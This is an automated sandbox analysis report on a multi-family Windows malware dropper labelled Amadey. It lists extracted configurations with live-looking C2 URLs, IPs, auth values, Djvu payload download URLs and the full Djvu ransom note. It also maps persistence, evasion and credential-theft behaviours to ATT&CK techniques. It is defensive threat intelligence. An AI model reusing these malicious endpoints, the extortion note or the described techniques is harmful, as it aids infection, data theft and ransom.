amadey | e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555

Analysis

max time kernel
51s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
14-05-2022 23:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe
Size

9.1MB
MD5

93e23e5bed552c0500856641d19729a8
SHA1

7e14cdf808dcd21d766a4054935c87c89c037445
SHA256

e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555
SHA512

3996d6144bd7dab401df7f95d4623ba91502619446d7c877c2ecb601f23433c9447168e959a90458e0fae3d9d39a03c25642f611dbc3114917cad48aca2594ff

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.znsjis.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://govsurplusstore.com/upload/

http://best-forsale.com/upload/

http://chmxnautoparts.com/upload/

http://kwazone.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

SUSHI

65.108.101.231:14648

Attributes

auth_value
26bcdf6ae8358a98f24ebd4bd8ec3714

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Extracted

Family

redline

Botnet

Ruzki 3k

194.87.71.5:12857

Attributes

auth_value
a48aca103247e146d387585961a62d1a

Extracted

Family

redline

Botnet

rr837

46.8.19.115:7225

Attributes

auth_value
ac2769d079acf4ae489929466c008394

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.kruu
offline_id
e8w5MeiBrZVoHLoloPm9MNlKBzXH70BB3B2KQ7t1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-2w6I3WpXEh Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@time2mail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0477JIjdm

rsa_pubkey.plain

Extracted

Family

vidar

Version

52.1

Botnet

937

https://t.me/verstappenf1r

https://climatejustice.social/@ronxik312

Attributes

profile_id
937

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5648-455-0x00000000022D0000-0x00000000023EB000-memory.dmp	family_djvu
behavioral2/memory/2052-466-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1196-366-0x0000000000E70000-0x000000000141C000-memory.dmp	family_ffdroider

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5000-213-0x0000000003980000-0x000000000429E000-memory.dmp	family_glupteba
behavioral2/memory/5000-214-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba
behavioral2/memory/5020-276-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba
behavioral2/memory/1936-372-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4344	3940	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4832	3940	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5604-399-0x0000000000970000-0x0000000000BB3000-memory.dmp	family_redline
behavioral2/memory/5604-402-0x0000000000970000-0x0000000000BB3000-memory.dmp	family_redline
behavioral2/memory/5604-406-0x0000000000970000-0x0000000000BB3000-memory.dmp	family_redline
behavioral2/memory/5604-404-0x0000000000970000-0x0000000000BB3000-memory.dmp	family_redline
behavioral2/memory/4708-420-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5280-432-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5264-433-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5312-445-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 2408 created 5000 2408 svchost.exe Graphics.exe
PID 2408 created 1936 2408 svchost.exe csrss.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata

description	pid	process	target process
PID 2408 created 5000	2408	svchost.exe	Graphics.exe
PID 2408 created 1936	2408	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4504-375-0x0000000001FC0000-0x0000000001FF0000-memory.dmp	family_onlylogger
behavioral2/memory/4504-376-0x0000000000400000-0x00000000004BF000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5548-453-0x0000000000640000-0x000000000068D000-memory.dmp	family_vidar
behavioral2/memory/5548-457-0x0000000000400000-0x00000000004F6000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

Processes:

md9_1sjm.exeFoxSBrowser.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFile.exepub2.exeFiles.exeDetails.exeFolder.exeGraphics.execsrss.exeinjector.exepWfAvzPqqzzRyPXCDJWsPz6h.exe

pid	process
1196	md9_1sjm.exe
2716	FoxSBrowser.exe
4460	Folder.exe
5000	Graphics.exe
3556	Updbdate.exe
4048	Install.exe
4428	File.exe
4284	pub2.exe
4564	Files.exe
4504	Details.exe
3724	Folder.exe
5020	Graphics.exe
1936	csrss.exe
1652	injector.exe
1656	pWfAvzPqqzzRyPXCDJWsPz6h.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Folder.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2648 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

5396 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2648	rundll32.exe

pid	process
5396	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RoughMorning = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Drops Chrome extension 1 IoCs

Processes:

Install.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 ip-api.com
259 ipinfo.io
288 ipinfo.io
293 api.2ip.ua
141 ipinfo.io
142 ipinfo.io
260 ipinfo.io
292 api.2ip.ua
373 api.2ip.ua
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
19	ip-api.com
259	ipinfo.io
288	ipinfo.io
293	api.2ip.ua
141	ipinfo.io
142	ipinfo.io
260	ipinfo.io
292	api.2ip.ua
373	api.2ip.ua

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 33 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4024	2648	WerFault.exe	rundll32.exe
5368	4504	WerFault.exe	Details.exe
5920	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
5432	4504	WerFault.exe	Details.exe
4560	5756	WerFault.exe	vOs56hwzYWQWI_3fHMlGokP6.exe
5496	4504	WerFault.exe	Details.exe
5660	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
5676	4504	WerFault.exe	Details.exe
4048	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
5472	4504	WerFault.exe	Details.exe
5844	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
4560	4504	WerFault.exe	Details.exe
2804	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
5608	5548	WerFault.exe	3Vsi0M1NBI0k9VWi599OOwa3.exe
4560	4504	WerFault.exe	Details.exe
6212	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
6284	6148	WerFault.exe	rundll32.exe
6448	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6564	4504	WerFault.exe	Details.exe
6692	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
6936	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
7124	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6164	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
2152	5420	WerFault.exe	KF_YrLxMIl2yskOzeDYCuihP.exe
6088	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
4508	5436	WerFault.exe	BGP70W9m4u1IsIIMPTVbaXMz.exe
3776	5560	WerFault.exe	Y0H2ghxo26_cTQ1I22UKK6Y9.exe
5880	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6136	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6472	5596	WerFault.exe	Tl1cbYkgdtQXODwKWSSSpZFM.exe
1156	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6388	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe
6404	5700	WerFault.exe	7xEruuE7r1W8VWkrAP7_FyU7.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1980 schtasks.exe
3884 schtasks.exe
5236 schtasks.exe
2432 schtasks.exe
6200 schtasks.exe

pid	process
1980	schtasks.exe
3884	schtasks.exe
5236	schtasks.exe
2432	schtasks.exe
6200	schtasks.exe

Delays execution with timeout.exe 11 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
6988	timeout.exe
7052	timeout.exe
5920	timeout.exe
5516	timeout.exe
6872	timeout.exe
6484	timeout.exe
4012	timeout.exe
5384	timeout.exe
7044	timeout.exe
4672	timeout.exe
6396	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 40 Go-http-client/1.1
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1172 taskkill.exe
6404 taskkill.exe
5744 taskkill.exe
2148 taskkill.exe

description	flow	ioc
HTTP User-Agent header	40	Go-http-client/1.1

pid	process
1172	taskkill.exe
6404	taskkill.exe
5744	taskkill.exe
2148	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Graphics.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	Graphics.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	Graphics.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	Graphics.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Install.exeGraphics.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Install.exe
